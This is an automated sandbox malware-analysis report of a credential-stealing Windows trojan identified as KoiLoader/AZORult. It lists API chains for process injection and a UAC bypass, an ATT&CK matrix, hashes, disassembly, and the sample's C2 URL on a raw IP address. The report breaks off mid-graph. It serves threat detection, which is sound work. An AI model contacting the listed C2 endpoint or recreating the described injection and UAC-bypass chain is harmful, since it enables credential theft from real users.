                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00D1B939 GetProcessHeap,0_2_00D1B939
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00D1788B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D1788B
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00D15079 SetUnhandledExceptionFilter,0_2_00D15079
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00D14A20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D14A20
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00D14EEC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D14EEC

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD5C70 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,0_2_00BD5C70
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, \explorer.exe0_2_00BD94A0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe0_2_00BD94A0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe0_2_00BD94A0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00D14DD3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00D14DD3
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exeCode function: 0_2_00BD89F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,GetFileAttributesW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,0_2_00BD89F0
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Access Token Manipulation
                    11
                    Virtualization/Sandbox Evasion
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                    Process Injection
                    1
                    Access Token Manipulation
                    LSASS Memory231
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    11
                    Process Injection
                    Security Account Manager11
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Bypass User Account Control
                    1
                    Deobfuscate/Decode Files or Information
                    NTDS1
                    Account Discovery
                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information
                    LSA Secrets1
                    System Owner/User Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    File and Directory Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Bypass User Account Control
                    DCSync2
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1674076 Sample: SecuriteInfo.com.Trojan.PWS... Startdate: 25/04/2025 Architecture: WINDOWS Score: 100 8 Found malware configuration 2->8 10 Malicious sample detected (through community Yara rule) 2->10 12 Antivirus detection for URL or domain 2->12 14 5 other signatures 2->14 5 SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe 2->5         started        process3 signatures4 16 Contains functionality to bypass UAC (CMSTPLUA) 5->16 18 Detected AZORult++ Trojan 5->18 20 Found evasive API chain (may stop execution after checking mutex) 5->20 22 3 other signatures 5->22

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe81%VirustotalBrowse
                    SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe81%ReversingLabsWin32.Trojan.Koiloader
                    SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe100%AviraHEUR/AGEN.1317648
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://79.124.78.173/incongruousness.php%temp%0%Avira URL Cloudsafe
                    https://www.wilkinsonbeane.com/css/slider0%Avira URL Cloudsafe
                    https://www.wilkinsonbeane.com/css/slider/c0%Avira URL Cloudsafe
                    http://79.124.78.173/incongruousness.php100%Avira URL Cloudmalware
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://79.124.78.173/incongruousness.phptrue
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://79.124.78.173/incongruousness.php%temp%SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.wilkinsonbeane.com/css/slider/cSecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe, 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.wilkinsonbeane.com/css/sliderSecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exetrue
                    • Avira URL Cloud: safe
                    unknown
                    No contacted IP infos
                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1674076
                    Start date and time:2025-04-25 13:31:19 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 3m 47s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe
                    Detection:MAL
                    Classification:mal100.bank.troj.expl.evad.winEXE@1/0@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 5
                    • Number of non-executed functions: 46
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 184.29.183.29, 4.245.163.56
                    • Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    No simulations
                    No context
                    No context
                    No context
                    No context
                    No context
                    No created / dropped files found
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):5.075796948750724
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe
                    File size:236'544 bytes
                    MD5:1452d6a3ec8d69b0b331bc751e9c117b
                    SHA1:9bf39e1ff35659600fc2220e322f0319f5d8add0
                    SHA256:eed8806090ae11e888fceb18bb633068a6cab9aeac590c10fb2d4b74e0251d84
                    SHA512:85f5506368d74a64e852e45380c15c3bc95b6cbefa5b86f3225919d8f87aea2f40e4883a25c8d52190b9d715ae2bec7d247c4fc72f2349293376be455dd4c145
                    SSDEEP:3072:BNwCrquaP24/h7Q22oWvjWn+V4t4jrv34CovCWcKqp0re5OkOYg7SCv:/UhAoAZoLiVCv
                    TLSH:88346C22F4C5B579E4B51977A4D9A5B0497EF8E01FB10DFB2B80848E5B71380FA21C6B
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.R2).<a).<a).<ab.?`#.<ab.9`..<ab.8`=.<a9.?`=.<a9.8`;.<a9.9`..<ab.=`..<a).=aC.<aa/5`(.<aa/.a(.<a)..a(.<aa/>`(.<aRich).<a.......
                    Icon Hash:90cececece8e8eb0
                    Entrypoint:0x404a16
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x67C9815B [Thu Mar 6 11:04:59 2025 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:66deda4204cb009d8c01c3f28c17567f
                    Instruction
                    call 00007F5831430CDAh
                    jmp 00007F583143074Fh
                    push ebp
                    mov ebp, esp
                    push 00000000h
                    call dword ptr [0041305Ch]
                    push dword ptr [ebp+08h]
                    call dword ptr [00413058h]
                    push C0000409h
                    call dword ptr [0041300Ch]
                    push eax
                    call dword ptr [00413014h]
                    pop ebp
                    ret
                    push ebp
                    mov ebp, esp
                    sub esp, 00000324h
                    push 00000017h
                    call dword ptr [00413060h]
                    test eax, eax
                    je 00007F58314308D7h
                    push 00000002h
                    pop ecx
                    int 29h
                    mov dword ptr [0041BAB8h], eax
                    mov dword ptr [0041BAB4h], ecx
                    mov dword ptr [0041BAB0h], edx
                    mov dword ptr [0041BAACh], ebx
                    mov dword ptr [0041BAA8h], esi
                    mov dword ptr [0041BAA4h], edi
                    mov word ptr [0041BAD0h], ss
                    mov word ptr [0041BAC4h], cs
                    mov word ptr [0041BAA0h], ds
                    mov word ptr [0041BA9Ch], es
                    mov word ptr [0041BA98h], fs
                    mov word ptr [0041BA94h], gs
                    pushfd
                    pop dword ptr [0041BAC8h]
                    mov eax, dword ptr [ebp+00h]
                    mov dword ptr [0041BABCh], eax
                    mov eax, dword ptr [ebp+04h]
                    mov dword ptr [0041BAC0h], eax
                    lea eax, dword ptr [ebp+08h]
                    mov dword ptr [0041BACCh], eax
                    mov eax, dword ptr [ebp-00000324h]
                    mov dword ptr [0041BA08h], 00010001h
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x19bf00x3c.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d0000x1f01c.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x3d0000x127c.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x18ac00x38.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x18a000x40.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x130000x120.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x112c80x114003c2aa453543c4a443a949d15635092deFalse0.5523947010869565data6.5422041328996485IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x130000x726c0x740046983291b6421caf11d351609177be80False0.4400929418103448data4.880208312863345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x1b0000x168c0xa0089343dc16e62571e7f8f0b7e2ee14a40False0.17890625data2.406474249960304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x1d0000x1f01c0x1f2009006dfa3fd338004d5d1ecd1316053ccFalse0.3493975903614458data3.52329835223916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x3d0000x127c0x1400507998f550e177d84b0a944183cbd2dfFalse0.7203125data6.333702787735152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_DIALOG0x1d1180x168dataEnglishUnited States0.6333333333333333
                    RT_RCDATA0x1d2800x1adataEnglishUnited States1.3461538461538463
                    RT_RCDATA0x1d29c0x1ec00dataEnglishUnited States0.34814850101626016
                    RT_MANIFEST0x3be9c0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                    DLLImport
                    KERNEL32.dllVirtualFree, GetCurrentProcess, VirtualAlloc, TerminateProcess, GetModuleHandleA, GetLastError, GetProcAddress, ExitProcess, VirtualProtect, BuildCommDCBAndTimeoutsA, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, DecodePointer
                    GDI32.dllLPtoDP
                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States
                    No network behavior found

                    Click to jump to process

                    • File
                    • Registry

                    Click to dive into process behavior distribution

                    Target ID:0
                    Start time:07:32:15
                    Start date:25/04/2025
                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Stealer.40606.28459.18224.exe"
                    Imagebase:0xd10000
                    File size:236'544 bytes
                    MD5 hash:1452D6A3EC8D69B0B331BC751E9C117B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1171762463.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Execution Graph

                    Execution Coverage

                    Dynamic/Packed Code Coverage

                    Signature Coverage

                    Execution Coverage:8.7%
                    Dynamic/Decrypted Code Coverage:17.9%
                    Signature Coverage:16.5%
                    Total number of Nodes:1381
                    Total number of Limit Nodes:9
                    Show Legend
                    Hide Nodes/Edges
                    execution_graph 11622 d1489a 11623 d148a6 ___scrt_is_nonwritable_in_current_image 11622->11623 11648 d14bf8 11623->11648 11625 d148ad 11626 d14a00 11625->11626 11637 d148d7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 11625->11637 11689 d14eec IsProcessorFeaturePresent 11626->11689 11628 d14a07 11693 d18694 11628->11693 11633 d148f6 11634 d14977 11656 d15001 11634->11656 11636 d1497d 11660 d13c60 11636->11660 11637->11633 11637->11634 11672 d1866e 11637->11672 11643 d1499d 11644 d149a6 11643->11644 11680 d18649 11643->11680 11683 d14d69 11644->11683 11649 d14c01 11648->11649 11699 d15185 IsProcessorFeaturePresent 11649->11699 11653 d14c12 11655 d14c16 11653->11655 11709 d15cdd 11653->11709 11655->11625 11769 d15d30 11656->11769 11659 d15027 11659->11636 11771 d13690 11660->11771 11663 d13ca6 ExitProcess 11664 d13c9b GetLastError 11664->11663 11665 d13caf BuildCommDCBAndTimeoutsA 11664->11665 11666 d13cd2 11665->11666 11667 d13cc2 GetCurrentProcess TerminateProcess 11665->11667 11860 d11710 11666->11860 11667->11666 11671 d13ce4 11678 d15037 GetModuleHandleW 11671->11678 11673 d18684 ___scrt_is_nonwritable_in_current_image _unexpected 11672->11673 11673->11634 12403 d1927a GetLastError 11673->12403 11679 d14999 11678->11679 11679->11628 11679->11643 12792 d184c8 11680->12792 11684 d14d75 11683->11684 11685 d149ae 11684->11685 12863 d18c74 11684->12863 11685->11633 11687 d14d83 11688 d15cdd ___scrt_uninitialize_crt 7 API calls 11687->11688 11688->11685 11690 d14f02 CallUnexpected 11689->11690 11691 d14fad IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11690->11691 11692 d14ff1 CallUnexpected 11691->11692 11692->11628 11694 d184c8 CallUnexpected 21 API calls 11693->11694 11695 d14a0d 11694->11695 11696 d18658 11695->11696 11697 d184c8 CallUnexpected 21 API calls 11696->11697 11698 d14a15 11697->11698 11700 d14c0d 11699->11700 11701 d15cbe 11700->11701 11715 d16ec7 11701->11715 11704 d15cc7 11704->11653 11706 d15ccf 11707 d15cda 11706->11707 11729 d16f03 11706->11729 11707->11653 11710 d15cf0 11709->11710 11711 d15ce6 11709->11711 11710->11655 11712 d15f79 ___vcrt_uninitialize_ptd 6 API calls 11711->11712 11713 d15ceb 11712->11713 11714 d16f03 ___vcrt_uninitialize_locks DeleteCriticalSection 11713->11714 11714->11710 11716 d16ed0 11715->11716 11718 d16ef9 11716->11718 11720 d15cc3 11716->11720 11733 d1710c 11716->11733 11719 d16f03 ___vcrt_uninitialize_locks DeleteCriticalSection 11718->11719 11719->11720 11720->11704 11721 d15f46 11720->11721 11750 d1701d 11721->11750 11725 d15f76 11725->11706 11728 d15f5b 11728->11706 11730 d16f0e 11729->11730 11732 d16f2d 11729->11732 11731 d16f18 DeleteCriticalSection 11730->11731 11731->11731 11731->11732 11732->11704 11738 d16f32 11733->11738 11736 d17144 InitializeCriticalSectionAndSpinCount 11737 d1712f 11736->11737 11737->11716 11739 d16f4f 11738->11739 11742 d16f53 11738->11742 11739->11736 11739->11737 11740 d16fbb GetProcAddress 11740->11739 11742->11739 11742->11740 11743 d16fac 11742->11743 11745 d16fd2 LoadLibraryExW 11742->11745 11743->11740 11744 d16fb4 FreeLibrary 11743->11744 11744->11740 11746 d16fe9 GetLastError 11745->11746 11747 d17019 11745->11747 11746->11747 11748 d16ff4 ___vcrt_InitializeCriticalSectionEx 11746->11748 11747->11742 11748->11747 11749 d1700a LoadLibraryExW 11748->11749 11749->11742 11751 d16f32 ___vcrt_InitializeCriticalSectionEx 5 API calls 11750->11751 11752 d17037 11751->11752 11753 d17050 TlsAlloc 11752->11753 11754 d15f50 11752->11754 11754->11728 11755 d170ce 11754->11755 11756 d16f32 ___vcrt_InitializeCriticalSectionEx 5 API calls 11755->11756 11757 d170e8 11756->11757 11758 d17103 TlsSetValue 11757->11758 11759 d15f69 11757->11759 11758->11759 11759->11725 11760 d15f79 11759->11760 11761 d15f89 11760->11761 11762 d15f83 11760->11762 11761->11728 11764 d17058 11762->11764 11765 d16f32 ___vcrt_InitializeCriticalSectionEx 5 API calls 11764->11765 11766 d17072 11765->11766 11767 d1708a TlsFree 11766->11767 11768 d1707e 11766->11768 11767->11768 11768->11761 11770 d15014 GetStartupInfoW 11769->11770 11770->11659 11884 d13d10 11771->11884 11774 d13d10 41 API calls 11775 d136fe 11774->11775 11888 d130c0 11775->11888 11781 d1376e 11782 d13d10 41 API calls 11781->11782 11783 d13783 11782->11783 11784 d13d10 41 API calls 11783->11784 11785 d1379f 11784->11785 11786 d13d10 41 API calls 11785->11786 11787 d137b8 11786->11787 11943 d13430 11787->11943 11790 d13d10 41 API calls 11791 d137f3 11790->11791 11950 d13470 11791->11950 11794 d13d10 41 API calls 11795 d13820 11794->11795 11975 d13660 11795->11975 11798 d13d10 41 API calls 11799 d13842 11798->11799 11978 d12aa0 11799->11978 11808 d13cf0 39 API calls 11809 d138d3 11808->11809 11810 d13d10 41 API calls 11809->11810 11811 d138fd 11810->11811 11812 d13d10 41 API calls 11811->11812 11813 d13919 11812->11813 11814 d13d10 41 API calls 11813->11814 11815 d13932 11814->11815 12018 d12d20 11815->12018 11818 d13d10 41 API calls 11819 d1395b 11818->11819 11820 d13d10 41 API calls 11819->11820 11821 d13979 11820->11821 12031 d12e00 11821->12031 11826 d13d10 41 API calls 11827 d139db 11826->11827 11828 d13d10 41 API calls 11827->11828 11829 d139f7 11828->11829 12060 d11bd0 11829->12060 11832 d13d10 41 API calls 11833 d13a6d 11832->11833 11834 d13d10 41 API calls 11833->11834 11835 d13a9b 11834->11835 12083 d11de0 11835->12083 11844 d13cf0 39 API calls 11845 d13b6c 11844->11845 11846 d13d10 41 API calls 11845->11846 11847 d13b7f 11846->11847 12225 d127f0 11847->12225 11850 d13d10 41 API calls 11851 d13bb9 11850->11851 11852 d13d10 41 API calls 11851->11852 11853 d13bdd 11852->11853 12228 d12830 11853->12228 11856 d13cf0 39 API calls 11857 d13c08 11856->11857 12236 d12970 11857->12236 12383 d11110 GetModuleHandleA 11860->12383 11862 d1173c 11863 d11110 17 API calls 11862->11863 11867 d11750 11863->11867 11864 d11844 11865 d17760 ___std_exception_destroy 14 API calls 11864->11865 11866 d11850 11865->11866 11868 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11866->11868 11867->11864 11869 d17ae8 ___std_exception_copy 15 API calls 11867->11869 11870 d1185d 11868->11870 11871 d11796 11869->11871 11877 d14766 11870->11877 12389 d11300 GetModuleHandleA VirtualAlloc 11871->12389 11874 d17760 ___std_exception_destroy 14 API calls 11875 d11838 11874->11875 11876 d17760 ___std_exception_destroy 14 API calls 11875->11876 11876->11864 11878 d1476f IsProcessorFeaturePresent 11877->11878 11879 d1476e 11877->11879 11881 d14a5d 11878->11881 11879->11671 12402 d14a20 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11881->12402 11883 d14b40 11883->11671 11885 d13d45 11884->11885 12251 d140d0 11885->12251 11889 d13d10 41 API calls 11888->11889 11890 d130ff 11889->11890 11891 d13d10 41 API calls 11890->11891 11892 d13110 11891->11892 11893 d13d10 41 API calls 11892->11893 11894 d13121 11893->11894 11895 d13cf0 39 API calls 11894->11895 11896 d13188 11895->11896 11897 d13cf0 39 API calls 11896->11897 11898 d13194 11897->11898 11899 d13cf0 39 API calls 11898->11899 11900 d131a0 11899->11900 11901 d13cf0 39 API calls 11900->11901 11902 d131ac 11901->11902 11903 d13cf0 39 API calls 11902->11903 11904 d131bb 11903->11904 11905 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11904->11905 11906 d131d3 11905->11906 11907 d131e0 11906->11907 11908 